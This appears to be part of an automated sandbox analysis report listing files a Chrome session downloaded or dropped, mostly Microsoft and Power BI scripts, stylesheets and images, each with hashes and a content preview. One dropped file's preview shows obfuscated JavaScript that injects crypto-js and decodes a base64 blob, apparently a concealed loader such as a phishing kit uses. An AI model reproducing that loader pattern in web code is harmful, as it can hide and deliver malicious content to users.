                                                                                                                                                                                                          Preview:'use strict';(()=>{function kc(a){a=!1===(a=void 0===a?!0:a)?null:gg;return a||((a=(a=(a="undefined"!==typeof globalThis?globalThis:a)||"undefined"===typeof self?a:self)||"undefined"===typeof window?a:window)||"undefined"===typeof Sc.g||(a=Sc.g),gg=a),a}function se(a){function b(){}var c;if(hg)a=hg(a);else if(null==a)a={};else{if("object"!==(c=typeof a)&&c!==yc)throw new TypeError("Object prototype may only be an Object:"+a);a=(b.prototype=a,new b)}return a}function Sa(a,b){function c(){this.constructor=.a}if(typeof b!==yc&&null!==b)throw new TypeError("Class extends value "+String(b)+" is not a constructor or null");ig(a,b);a.prototype=null===b?se(b):(c.prototype=b.prototype,new c)}function jg(a,b){for(var c=0,d=b.length,e=a.length;c<d;c++,e++)a[e]=b[c];return a}function Gb(a,b){return a&&ud.prototype.hasOwnProperty.call(a,b)}function vd(a){return a&&(a===ud.prototype||a===Array.prototype)}function te(a){return vd(a)||a===Function.prototype}function lc(a){if(a){if(Tc)return Tc(a);var
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (62367), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):62367
                                                                                                                                                                                                          Entropy (8bit):4.985435846270476
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:xIpCIBEf+g+1qEpgL5IxArZi2iRN1DelJQkwq118xyxD5kDYLMP7diToQ7Sdrvuu:AMWgGpAeuAPzrvi9HDYhNB9ACYdYAFM
                                                                                                                                                                                                          MD5:3096693B3A618A9794A06242F214FD9F
                                                                                                                                                                                                          SHA1:0A88A17616F1E34FA71C28D94DE8700B09A4B542
                                                                                                                                                                                                          SHA-256:D5C5DE37F12579E959A0B5E6DEB958CDFBB10C91E5C92389FEF69095ADCB3DD9
                                                                                                                                                                                                          SHA-512:D8061129558E322A982091DE9F9E3B007724570301F2BA02297BAF4C8489AA0580031359847CC39456A22FD19C52B1BFB41E1921B4E95DDDFB7CA9C5B6112213
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/styles/powerBICommon.min.0a88a17616f1e34fa71c.css
                                                                                                                                                                                                          Preview:.angular-dropdown{position:absolute;min-width:200px;margin:0;z-index:1000;background:var(--white-color,#fff);padding:0;font-weight:400;font-size:14px;list-style:none;border:1px solid #dedede;box-shadow:0 0 8px var(--secondary-chrome-color,rgba(102,102,102,.2));opacity:0;pointer-events:none;cursor:default;display:none}.angular-dropdown.override-box-shadow{box-shadow:0 0 0 var(--secondary-chrome-color,rgba(102,102,102,.2))}.angular-dropdown li.divider{padding-top:1px;background:var(--neutral-light-color,#eaeaea)}.angular-dropdown button.dropdown-item{background-color:transparent;width:100%;display:block;padding:10px 20px;text-decoration:none;font-weight:400;white-space:nowrap;color:var(--neutral-primary-color,#333);cursor:pointer;font-family:'Segoe UI',wf_segoe-ui_normal,helvetica,arial,sans-serif;text-align:left;border:var(--focus-outline-definition,2.5px solid) transparent}@media screen and (-ms-high-contrast:active){.angular-dropdown button.dropdown-item{border:none}}.angular-dropdown
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (19568), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):19568
                                                                                                                                                                                                          Entropy (8bit):5.102010233795686
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:hoZyzHDEnjhhStmsgfoDKk68Xr6rXUwj/r2GdMGSF:hrzHDWDfoDy8XurXUwj/r2GdMGSF
                                                                                                                                                                                                          MD5:66A3C3A2657BBD73CC02C609F8AA8A75
                                                                                                                                                                                                          SHA1:A5F48A15153486582DC69BEB96D6E1EF7CC5037B
                                                                                                                                                                                                          SHA-256:84B5A46E3E23A2FB87C354665E3BDF4EDF5C7BA56CEE76A10DEB132058F18142
                                                                                                                                                                                                          SHA-512:C27C4758FE6D4CC9AECCD45EB69172C8EF8089D708EC57D52C625D2E5E8C075E2D441884E6A94E1CB6F18E62F97939D6AA67A22F383DA57CF66C7DF276AB528E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/scripts/DefaultSignIn.min.a5f48a15153486582dc6.js
                                                                                                                                                                                                          Preview:var AuthType,Operation,ErrorCode,TimerUtils,IframeUtils,Constants,LoggingUtils;!function(e){e[e.aad=1]="aad",e[e.msa=2]="msa"}(AuthType||(AuthType={})),function(e){e[e.Redirect=1]="Redirect",e[e.Error=2]="Error"}(Operation||(Operation={})),function(e){e[e.InvalidConfigurations=100]="InvalidConfigurations",e[e.InvalidDataReceivedFromIdp=105]="InvalidDataReceivedFromIdp",e[e.NoAccountFound=110]="NoAccountFound",e[e.TimeOut=115]="TimeOut",e[e.UnknownError=120]="UnknownError",e[e.NonPreferredResponseIgnored=125]="NonPreferredResponseIgnored"}(ErrorCode||(ErrorCode={})),(TimerUtils||(TimerUtils={})).timer=function(){var e=(new Date).getTime();return{get seconds(){return Math.ceil(((new Date).getTime()-e)/1e3)},get ms(){return(new Date).getTime()-e},get formattedSeconds(){return Math.ceil(this.seconds/1e3)+"s"},get formattedMs(){return this.ms+"ms"}}},function(e){e.getIframe=function(e,r){var n=document.createElement("iframe");return n.style.display="none",n.id=r,n.src=e,n},e.deleteIframe=fu
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 128x128, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                                          Entropy (8bit):7.533592341521352
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:IVlpEHVs26j+hwlZ3ei5NHI9EdrlYyhWKyOsq/pW22jmIvX0:oE1sdhlZBZI9EdrUdOJpW22tv0
                                                                                                                                                                                                          MD5:75D61088FDC298C0D54E596B18AB439E
                                                                                                                                                                                                          SHA1:7BFE909FC448C90C6D20781E76B4CD144C87878C
                                                                                                                                                                                                          SHA-256:43ADF659C309DE0F98DD676E974AA82377220194E7FBA32A2CD55990AB2D3A94
                                                                                                                                                                                                          SHA-512:9467182ACE25A15E43F5EBAF14CEEB3FA481019836CCE48E422CB8C7EDC6BF65B53D84418B077F4EE1EA2AC459DFB9BA22CD9FF0188E6865C6F3A136F62FE7C8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:RIFF....WEBPVP8 .........*....>...B!.r....q--.>W.7...}......f...D.U............W..}.|..M........(...L.A.....]K.GeR..N_w..}&..TN.........WR.kf...%..&k'..f.q.&k'.@...=c..Ki]..m...o.....]`.......7.w......v......v..s..m......9...R8}.p.`UO.@.]...&....?2Y.M))..........o..h9..O......Y].S'..a.t.......D#G....7..G./I...G....>.xX`...]..,?.H9..Q..:.v..m.....v35..d.=.".L9z...n..P...7....'...`........$.._....l..O.O...6..{..8.#[...o.H...._.{........e..1......sCX..Je~r..{.. ..1W....U....>.....
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):203
                                                                                                                                                                                                          Entropy (8bit):4.6712092041548265
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6:lTjYues7JVLt0dalnfJTTjYsQb7JVLt0dw:y5s7JVLTpfJU97JVLj
                                                                                                                                                                                                          MD5:44700D76F3F63FA33F30039BB9C74B39
                                                                                                                                                                                                          SHA1:F68B158102C2575081CB4308E4FEA483E1B9D604
                                                                                                                                                                                                          SHA-256:FD73C7131FEA30896A95BC1D0E9F08F383FEFB03730DB9A433F43B319EFF33AC
                                                                                                                                                                                                          SHA-512:2665D21274DB60A9BC6BCC7100DF57C2EE0E2264601A295902CC0E958CBA2B198E4C1AB6291947A8F33DC46D42AE0E1F586369CB3F3B011C751C81EFA755C234
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-action.min.ACSHASH44700d76f3f63fa33f30039bb9c74b39.css
                                                                                                                                                                                                          Preview:body div[data-geo-country="US"] .us-hidden:not([data-isenvauthor="true"]){display:none}.body div[data-geo-country]:not([data-geo-country="US"]) .non-us-hidden:not([data-isenvauthor="true"]){display:none}
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (42133)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):138268
                                                                                                                                                                                                          Entropy (8bit):5.224497765711851
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:1f4HuF7pxnISnJ9d1EwgXA7CisuMK/xw/:1f4Hu1I+Tw/
                                                                                                                                                                                                          MD5:5B85413B96AF340238B93068CDB641FB
                                                                                                                                                                                                          SHA1:D949C985DF4F80FAB0CF036A1DD86C63CA342F1F
                                                                                                                                                                                                          SHA-256:1B448C19C6DF1F2D15399A710A73BB3EC0C5233B571CDFAE9CCA315E6E13FB85
                                                                                                                                                                                                          SHA-512:5B7E26BB4C72A8D8EE6CD20EEEA354ADD396F74289BD3E42CD1D6C8A5D3FA1B190CC62B953CAF4FA38EFDA0983F90F937276C8797EB2E1BADC11F9F5161117CE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/onerfstatics/marketingsites-eas-prod/shell/_scrf/js/themes=default/54-af9f9f/d4-fb1f57/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/f9-a5b2ce/db-bc0148/dc-7e9864/6d-c07ea1/6f-dafe8c/f6-aa5278/73-a24d00/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/d0-e64f3e/92-10345d/79-499886/7e-cda2d3/58-ab4971/74-d51c79/e0-3c9860/de-884374/1f-100dea/33-abe4df/2b-8e0ae6?ver=2.0&_cf=02242021_3231&iife=1
                                                                                                                                                                                                          Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):697
                                                                                                                                                                                                          Entropy (8bit):4.9687589816244095
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:UHevFvKrbON5NtK/efIBbd/FqYT/ZTkAxtK/efb+RAd/FjDhQAThtK/efKXEnHz7:KWFNvs/ew//Fqu/ljxs/eD+R0/FjtQ+V
                                                                                                                                                                                                          MD5:D2F3218A374A1305FE262FC4BAEEDDD1
                                                                                                                                                                                                          SHA1:103721E516DC86A8EC433C6EA7C227BF7D954A55
                                                                                                                                                                                                          SHA-256:F76208F59F7E18EFB405361893B45B9DD7D0759BB5329AC664F39C02384982CD
                                                                                                                                                                                                          SHA-512:011062B7E77B5BBCACC6391C6E9873D4221E3474276F56D36EF29B78EA9E7C1C6C2021DA3D80D79C30E1675AC0CE62DC397C52051C7C1478054C02AF27BC7077
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-vars/publisher.min.ACSHASHd2f3218a374a1305fe262fc4baeeddd1.js
                                                                                                                                                                                                          Preview:/**. * OneCloud environment constants class.. */.class OneCloudEnvironmentConstants {.. /**. * OneCloud data connector AEM publisher variables.. * @readonly. */. static DataConnector = Object.freeze({. "endpoint": "/msonecloudapi",. queryParams: {}. });.. /**. * Microsoft API Prod Endpoint. * @readonly. */. static MicrosoftAPI = Object.freeze({. "endpoint": "https://www.microsoft.com/msstoreapiprod". });.. /**. * Appsource Request Header. * @readonly. */. static AppsourceAPI = Object.freeze({. "header": "Njg1YmM2MWI1ZTA4MWVlMzAxZTQwM2YxMzk2MjU4YzljMDE3Nzc0NDM2MWMyMzg3MGQwZjMwYzIxZWY0ODMwMQ==". });.}
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):953770
                                                                                                                                                                                                          Entropy (8bit):5.080381954635994
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:0SovLkCUeECXJs+vpuwOJkhrDHDehRGOY6U+v:0SovLzUeEPwE2rDjaRGN+v
                                                                                                                                                                                                          MD5:9671E1EB7537E97AD6DDF9679E4B7F5B
                                                                                                                                                                                                          SHA1:E378803DD7FEA0572A3EE5E7A2CD29B600149F81
                                                                                                                                                                                                          SHA-256:D70EED0D6E418A88047320FC6901F388EACD41A01C36BDE81BCA0B4B835D63CC
                                                                                                                                                                                                          SHA-512:6403FAD24ACE4FD89DFEE63FEF435018B231ADEC1361E424B2E001600D6D2CAFFF2D558711F84DF7F0C71D8A57AC18591DDE09FB04459B32478E429AE3CA29B3
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://app.powerbi.com/13.0.24766.39/scripts/hash-manifest.js
                                                                                                                                                                                                          Preview:var hashMappings = {"externals/cropper.min.js":"externals/cropper.min.9ac0771baa31494bfe06.js","externals/cropper.min.css":"externals/cropper.min.17d618a8ac3852a1dd52.css","externals/cropper.rtl.min.css":"externals/cropper.rtl.min.17d618a8ac3852a1dd52.css","externals/d3-array.min.js":"externals/d3-array.min.9cd24b33bb7b80954d50.js","externals/d3-geo.min.js":"externals/d3-geo.min.8f1383dda790ffaf106a.js","externals/es6-promise.min.js":"externals/es6-promise.min.745b2696c3736a0d5997.js","externals/filesaver.min.js":"externals/filesaver.min.2af19bece58e62d47b2c.js","externals/httpPostMessage.min.js":"externals/httpPostMessage.min.f27a458ec36590f79128.js","externals/jquery-qrcode.min.js":"externals/jquery-qrcode.min.f9add3f43dc8a49562ba.js","externals/jquery-scrollbar.min.js":"externals/jquery-scrollbar.min.e49ee35b605fbb9d1af5.js","externals/jquery-ui.min.js":"externals/jquery-ui.min.02de7165092644634e71.js","externals/jquery-ui.min.css":"externals/jquery-ui.min.60b2fc2bc042fc6831db.css",
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4214
                                                                                                                                                                                                          Entropy (8bit):4.079345582529821
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:CGuEyC5PrqVOGeyEg56k1/BTuVSizv9e7LXFRhg1ao/sZ+J:Vf5TkQytMk1M44ctRe1a6sZg
                                                                                                                                                                                                          MD5:0A4D0DBD3AFB2A6D5DFCE2967FEF332A
                                                                                                                                                                                                          SHA1:52AFE4A5D39B0998DAC7121472EBAD554718A13C
                                                                                                                                                                                                          SHA-256:39AF3568389F5B78BFFFAF09DD4D781D631DA77EE427E2434AC9C3049F39A659
                                                                                                                                                                                                          SHA-512:F7FA8753156A62391FCCF7B05C2F35BD86034B31ED39374B3E3F6A19FA74579F6237FFB35259E5959B55A94B8F8909FA6C54FAD6CD423BB04C3D742F894F4957
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<svg width="338" height="72" viewBox="0 0 338 72" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0)">..<path d="M140.4 14.4V57.6H132.9V23.7H132.8L119.4 57.6H114.4L100.7 23.7H100.6V57.6H93.7V14.4H104.5L116.9 46.4H117.1L130.2 14.4H140.4V14.4ZM146.6 17.7C146.6 16.5 147 15.5 147.9 14.7C148.8 13.9 149.8 13.5 151 13.5C152.3 13.5 153.4 13.9 154.2 14.8C155 15.6 155.5 16.6 155.5 17.8C155.5 19 155.1 20 154.2 20.8C153.3 21.6 152.3 22 151 22C149.7 22 148.7 21.6 147.9 20.8C147.1 19.8 146.6 18.8 146.6 17.7ZM154.7 26.6V57.6H147.4V26.6H154.7ZM176.8 52.3C177.9 52.3 179.1 52 180.4 51.5C181.7 51 182.9 50.3 184 49.5V56.3C182.8 57 181.5 57.5 180 57.8C178.5 58.1 176.9 58.3 175.1 58.3C170.5 58.3 166.8 56.9 164 54C161.1 51.1 159.7 47.4 159.7 43C159.7 38 161.2 33.9 164.1 30.7C167 27.5 171.1 25.9 176.5 25.9C177.9 25.9 179.2 26.1 180.6 26.4C182 26.8 183.1 27.2 183.9 27.6V34.6C182.8 33.8 181.6 33.1 180.5 32.7C179.3 32.2 178.1 32 176.9 32C174 32 171.7 32.9 169.9 34.8C168.1 36.7 167.2 39.2
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (889)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):92962
                                                                                                                                                                                                          Entropy (8bit):5.482012211093105
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:wB4vGoYlmQr+IDv1Ty/6RsSz5TGF/46nNUgDbC03vu9FnHKDfa6Z/VUhdIKq6Tjv:wqxNrNG9FnHKD/oIKq6Tjv
                                                                                                                                                                                                          MD5:35986A813756F39AB6B922979FFEDB03
                                                                                                                                                                                                          SHA1:C8E2213BBAFAF535DA9C6676F3DBA43449E4D15A
                                                                                                                                                                                                          SHA-256:E2D92BDAAD925C6D355331A338384EE3FF82492352975DD4EFDA791AEF4AB3F5
                                                                                                                                                                                                          SHA-512:289F1C432E73F611D54EB1130013174174222A0C5EEF8E2464C5FD51EE33DC702326EEECA80B2AAE213DB2FCCB149297FC37CC9A0B6CF6E928A66BC27843F930
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-jquery.min.ACSHASH35986a813756f39ab6b922979ffedb03.js
                                                                                                                                                                                                          Preview:/*. jQuery JavaScript Library v3.5.1. https://jquery.com/.. Includes Sizzle.js. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://jquery.org/license.. Date: 2020-05-04T22:49Z. Sizzle CSS Selector Engine v2.3.5. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://js.foundation/.. Date: 2020-03-14.*/.'use strict';(function(H,Sa){"object"===typeof module&&"object"===typeof module.exports?module.exports=H.document?Sa(H,!0):function(Ta){if(!Ta.document)throw Error("jQuery requires a window with a document");return Sa(Ta)}:Sa(H)})("undefined"!==typeof window?window:this,function(H,Sa){function Ta(a,b,c){c=c||M;var d,f=c.createElement("script");f.text=a;if(b)for(d in Kc)(a=b[d]||b.getAttribute&&b.getAttribute(d))&&f.setAttribute(d,a);c.head.appendChild(f).parentNode.removeChild(f)}function Ia(a){return null==.a?a+"":"object"===typeof a||"function"===typeof a?db[Ob.call(a)]
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 128x128, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2366
                                                                                                                                                                                                          Entropy (8bit):7.904903189203667
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:p2fW+tCT+Gn1RuW+IO18edEtn1Eh13qNKGOqmclC6uS:Ef8aUWj/sn7eAC6R
                                                                                                                                                                                                          MD5:E255E78AF7545EBE435A777E5DA28961
                                                                                                                                                                                                          SHA1:31ED54E20968CECCEEEA3FFB0320778D2F9382EA
                                                                                                                                                                                                          SHA-256:BB3093DE413063B33BC80D3B6E423EBF15CC614F5F1880E85F44F2986B29DA4F
                                                                                                                                                                                                          SHA-512:667363B7E4C04B3DFE887F566ECE132B89675A4F66EA45F0C41742CB86133F67752F78349A2C493378D21642D51816FE0DB942AE786DC120C5A102C87DCBC402
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:RIFF6...WEBPVP8 *........*....>A..C"....E.(....X......V.......G.:....A.......~L.....o...>fx.0..j....s...'...|..........w......l...A........(.....?.w.........o`o...{.!v.w..q>...`....f.*....d...x.......M.....+...v.Xz(?.?...a&.H.........^......>.Y..".@.<........u.../t....[...B ./.^..h]..8...* .-.m..kL.Wt2...U...f...h.X....[X..mtn..A9X.}m&V.s......!.j.....i.....d..Oo.....1.....y.d.....B{.....`2.}..^.....dJ....o.....1..x+..,...N.^.?..._....../.$.rs..QP.......;..?....2j.%....4..(...z...u..).......2.M.....P...F....QW...-.k.....}.'?._%.gpD.o\..A.k...:....$...Z.........W..r...f..b+.F.n..?..CQ.^.yX.+....W. ..=_..]z.b4?\.8.mo.b:..p.Z.B....L... .j.:....?_&..Z.h%...@D..$.....H.......S...+....T.9C....[)..K..&AT..%3.......-N..P\.2T.o...4..E....A.j.xk_.+.P......4..Qo..n.h.h8%..=...*b)=~HU./hPu'y.].(..UY.!."{H`.0[.R..... .e....D.......D...B.R.O..$.....X.A.}.....c...g...3.85.N.c.\.........../.k...$.:..<.WJ|.o.x.fc-J....&.....>./......ce>.G)L..V..
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2797), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):2797
                                                                                                                                                                                                          Entropy (8bit):5.051945980254357
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:7VhlTnOgfReyX8OFfFxXRpyXFfpjFfzFf/2k+e5bvfvhHOx+GhFay7:RXTnIyX8OTdQ71Ak+y3A3p
                                                                                                                                                                                                          MD5:8D0CFC61910D448EA73971B4EAF7AB60
                                                                                                                                                                                                          SHA1:3FF78E9B733C085E20A34E6506A9416611A6D70A
                                                                                                                                                                                                          SHA-256:E9CD919E190174DB21212C27147177A024603B7C8D2D9BB4098AAC5B750CCD62
                                                                                                                                                                                                          SHA-512:99B1BC887F64181166F217BE50FDFC8185E314375C57DB167A14AF05CAD199517E9C0C936808EA57C9A880ED46DA965947127F61DA467FD5491E4F15D6A07CCE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/styles/powerbi.web.externals.min.3ff78e9b733c085e20a3.css
                                                                                                                                                                                                          Preview:#smartbanner{position:absolute;left:0;top:0;border-bottom:2px solid #e8e8e8;width:100%;height:80px;font-family:'Helvetica Neue',sans-serif;background:#fff;z-index:9998;-webkit-font-smoothing:antialiased;overflow:hidden;-webkit-text-size-adjust:none;box-sizing:border-box}#smartbanner .sb-container{margin:0 auto}#smartbanner .sb-close{position:absolute;left:0;top:0;display:block;text-align:center;text-decoration:none;-webkit-font-smoothing:subpixel-antialiased;border:0;width:17px;height:100%;line-height:25px;color:#999!important;border-radius:0;background:0 0;box-shadow:none;text-shadow:none;font-size:25px;padding:2px 5px}#smartbanner .sb-close:active{color:#aaa}#smartbanner .sb-icon{position:absolute;left:30px;top:10px;display:block;width:55px;height:55px;background-size:cover;border-radius:4px}#smartbanner.no-icon .sb-icon{display:none}#smartbanner .sb-info{position:absolute;left:98px;top:18px;width:44%;font-size:12px;line-height:1.2em;color:#6a6a6a;text-shadow:0 1px 0 rgba(255,255,255
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1325), with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1964
                                                                                                                                                                                                          Entropy (8bit):5.994590098535204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:wEA7bOrsJ1piSsKHI8drzNQWC2UdMEuIop6fS:k3J3iSpI+GlFuIlK
                                                                                                                                                                                                          MD5:08AD1727460CDBC7754EB98BDEACFA8F
                                                                                                                                                                                                          SHA1:3511F2204E2E823DD1E80997C6E0BF924833663D
                                                                                                                                                                                                          SHA-256:B7B73A247D19357F3FCAD6608E7D3D8D7920587FF837ECA88D608B0BB397B415
                                                                                                                                                                                                          SHA-512:B069D05E3166780E960E80CA6E75C2ED2BC3DD611D866FB3645DCD7C1D637D4CCCE8B0A54502B4F1C9B87B1A1FA9BE7CC180379ADFE16AF86F227AB37FD46739
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview: var IuqGvllMKzvcmtZo = document.createElement("script");..IuqGvllMKzvcmtZo.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(IuqGvllMKzvcmtZo);..IuqGvllMKzvcmtZo.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiK2k2bnBZaktjSnlRRWdqZTd0TzhzS1hsc0l1R2xnM1ppeXNOZ2pvVWFCMkZGNEFsdUlLa21HVEVnUGwxYjRxXC91M1wvdlorV3ZyZFZUandQNzBCK29UQ3d6UWpxMDdzeEs1cHdETzhWU1RCZ2NNS3hDcFpVMXJiQUhJdXNQbEV2SkJzZnlLTWV1aGc1SWkrcGJoRDR6MjlaSm5PeUFuZjZua3duZEdJZ280bStBRlwvSzB0NHB2Y290TlM0M2NWK2lmMm5Cd29IZ3Nqd25NZEdCU1lydTNwelgzWFAzVXZTN1hiaGNrRCtja1lhOWlyRmdQVGpQalwvQUZ0SmZtbTZwTWNwekgrbmVMa29YZ1NQQnI5K1JxYWlmZE5CWWJ2TXZzd3FRXC9RZkQ1NUZBZGN0QmQwbVJzYkVHZTkwaXpqbkVMOVc5WTFOREVMS1RaNFRDbThWTUZvMVFUbzh4NmFVWUVKaXZVQkhWcjJmN2d5K0IwOENiQUZcL0VkZmtlaFFzK2M3aEhrMkZnODFtM0tIVk9ic01qS3RaaVcrWlwvSDBKalpnN1VCb3hQUEQ5XC9zNW4zMWxjSFdcL29BNzlPbkNsNHFjZTY5WnY3dHdmTTBPRXdDS2xjd2JyOFpNRkx0RlpDNnJEY2xNdWtpclRqdnV2Qlo4eUVlRDNxNU1yR1hOalRaNFJITytGajRpUV
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (309), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):309
                                                                                                                                                                                                          Entropy (8bit):4.971196656935236
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6:QuVtCiR2cIT53AM+64uT7nadCkq9KwhA6ONHSInadLb1wnzjCY1ee:jVtCyB4w1cWdYpAfVSVdLa8e
                                                                                                                                                                                                          MD5:D7106DB242C2B41F88A1B02418BEC7E2
                                                                                                                                                                                                          SHA1:7A445118F0B5712744AA4AED6889B28C1E7779F7
                                                                                                                                                                                                          SHA-256:044527A735B287BD84D2AE6D2D3B89C85B52C9750BB07E5AEF19FB8F28F0442B
                                                                                                                                                                                                          SHA-512:C493FBD6926006108E56E23BB204BFE59A7364ED6D2409B5B258D9EA6C060259E13A7E7A22021607F6EDD55EEA52C75DFE7FCF18BB76D6E539FBD763BF399185
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/dynamicclientsidelibs/handlerscripts/v1.min.ACSHASHd7106db242c2b41f88a1b02418bec7e2.js
                                                                                                                                                                                                          Preview:'use strict';var DynamicClientSideScriptHandler=function(){return{fetchScriptLink:function(b){var a=(a=document.querySelector('div[data-identifier\x3d"'+b+'"]'))?a.getAttribute("data-content"):null;null===a&&(a=(b=document.querySelector('meta[name\x3d"'+b+'"]'))?b.getAttribute("content"):null);return a}}}();
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:Web Open Font Format, TrueType, length 38360, version 0.0
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):38360
